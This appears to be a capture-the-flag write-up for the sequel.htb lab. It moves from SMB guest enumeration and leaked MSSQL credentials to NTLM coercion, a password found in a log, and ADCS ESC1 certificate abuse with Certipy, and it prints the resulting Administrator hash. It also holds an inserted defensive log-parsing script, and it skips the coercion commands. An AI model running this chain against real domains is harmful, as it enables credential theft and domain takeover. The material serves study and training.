Medium Windows Active Directory machine on sequel.htb. Anonymous SMB access
exposes a PDF containing SQL credentials. From MSSQL, xp_dirtree coerces an
outbound NTLM authentication captured by Responder — cracking the hash gives WinRM access
as sql_svc. The SQL error log contains a password typed into the username field,
pivoting to Ryan.Cooper. An ADCS ESC1 misconfiguration allows requesting a
certificate for Administrator, yielding the NT hash via Certipy and faketime
for the +8h clock skew.
User Flag
b25d949f62xxxxxxxxxxxxxxxxxxxxxx
Root Flag
4523a45b65xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance
Full port scan reveals a Domain Controller profile with an exposed MSSQL instance. Note the ~8h clock skew — this will matter during Kerberos authentication later.
nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.xx.xx
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec
389/tcp  open  ldap          Domain: sequel.htb
445/tcp  open  microsoft-ds  Windows Server 2019
1433/tcp open  ms-sql-s      SQL Server 2019 RTM
5985/tcp open  wsman         WinRM
|_clock-skew: mean: 7h59m58s
Clock skew +8h: Kerberos requires clocks within 5 minutes of the DC. Certipy's auth step will fail without compensating for it — use faketime -f "+8h" per command.
/etc/hosts
$ echo "10.129.xx.xx sequel.htb dc.sequel.htb" | sudo tee -a /etc/hosts
Test SMB — null session is denied but the guest account works and reveals a non-default Public share:
SMB guest access
$ nxc smb 10.129.xx.xx -u guest -p '' --shares
Public    READ
IPC$      READ
$ smbclient //10.129.xx.xx/Public -U guest
smb: \> get "SQL Server Procedures.pdf"
The PDF is an internal onboarding document. A section at the bottom provides SQL Server access for users whose accounts haven't been created yet:
SQL Server Procedures.pdf
User: PublicUser
Password: GuestUserCantWrite1
Credentials: PublicUser:GuestUserCantWrite1 for MSSQL. The document also mentions users Tom, Ryan, and Brandon — worth noting for later enumeration.
02 Foothold — xp_dirtree NTLM Coercion
Connect to MSSQL and assess privilege level. xp_cmdshell is locked, but xp_dirtree is available — it accepts UNC paths, forcing an outbound NTLM authentication we can capture with Responder.
From the sql_svc shell, browse the filesystem. C:\Users shows a Ryan.Cooper profile — inaccessible for now. But SQL Server error logs are readable and contain something unexpected:
SQL error log — password typed as username
*EWR* type C:\SQLServer\Logs\ERRORLOG.BAK
Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match...
Logon failed for user 'NuclearMosquito3'. Reason: Password did not match...
Finding: someone typed their password (NuclearMosquito3) into the username field during SQL Server setup, and the error log captured it in plaintext. Credentials: ryan.cooper:NuclearMosquito3.
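As an added defender-side check (not part of the original writeup): a small parser over a constructed ERRORLOG excerpt that flags failed logons whose "username" is an unknown login shaped like a password, and masks the value so the alert itself does not repeat the secret. The sample lines, the known-login set and the heuristic thresholds are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample ERRORLOG excerpt (not the box's real log); the entries mirror the
# "Logon failed for user" lines quoted above, plus a normal SQL login failure as control.
SAMPLE_ERRORLOG = """\
2024-01-01 09:00:01.10 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-01 09:00:03.42 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-01-01 09:00:07.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

LOGON_FAIL = re.compile(
    r"^(?P<ts>\S+ \S+)\s+Logon\s+Logon failed for user '(?P<user>[^']*)'"
    r".*?\[CLIENT: (?P<client>[^\]]+)\]"
)

@dataclass
class Suspect:
    timestamp: str
    client: str
    masked_user: str  # first/last char only, so the alert does not re-leak the secret

def looks_like_password(name: str) -> bool:
    # Heuristic (assumed thresholds): no domain separator, 8+ chars, 3+ character classes.
    if "\\" in name or "@" in name:
        return False
    classes = sum(
        any(pred(c) for c in name)
        for pred in (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    )
    return len(name) >= 8 and classes >= 3

def mask(name: str) -> str:
    return name[0] + "*" * (len(name) - 2) + name[-1] if len(name) > 2 else "*" * len(name)

def find_suspect_logons(errorlog: str, known_logins: set) -> list:
    """Return failed logons whose 'username' is an unknown login shaped like a password."""
    hits = []
    for line in errorlog.splitlines():
        m = LOGON_FAIL.match(line)
        if not m or m["user"] in known_logins:
            continue
        if looks_like_password(m["user"]):
            hits.append(Suspect(m["ts"], m["client"], mask(m["user"])))
    return hits

if __name__ == "__main__":
    for s in find_suspect_logons(SAMPLE_ERRORLOG, {"sa", "PublicUser"}):
        print(f"{s.timestamp} {s.client} possible password in username field: {s.masked_user}")
```

Run it against a real ERRORLOG (and its .BAK rotations) on the SQL host; a hit means the log file itself now needs the same protection as the credential it recorded.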
While on sql_svc, whoami /groups showed membership in BUILTIN\Certificate Service DCOM Access — a hint that ADCS is installed and worth enumerating. Run Certipy as Ryan.Cooper to find vulnerable templates:
ESC1: The template lets any Domain User specify an arbitrary Subject Alternative Name (SAN) while also allowing Client Authentication. This means any domain user can request a certificate that impersonates any account — including Administrator.
Request a certificate with the Administrator's UPN in the SAN:
Certipy — request cert for Administrator
$ certipy-ad req \
    -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' \
    -ca sequel-DC-CA \
    -template UserAuthentication \
    -upn administrator@sequel.htb \
    -dc-ip 10.129.xx.xx
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Saved as 'administrator.pfx'
Authenticate with the certificate to get the NT hash. The +8h clock skew causes KRB_AP_ERR_SKEW — wrap the command in faketime:
Certipy auth (faketime +8h)
# without faketime — fails
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.xx.xx
[-] KRB_AP_ERR_SKEW(Clock skew too great)
# with faketime — succeeds
$ faketime -f "+8h" certipy-ad auth -pfx administrator.pfx \
    -domain sequel.htb -username administrator -dc-ip 10.129.xx.xx
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee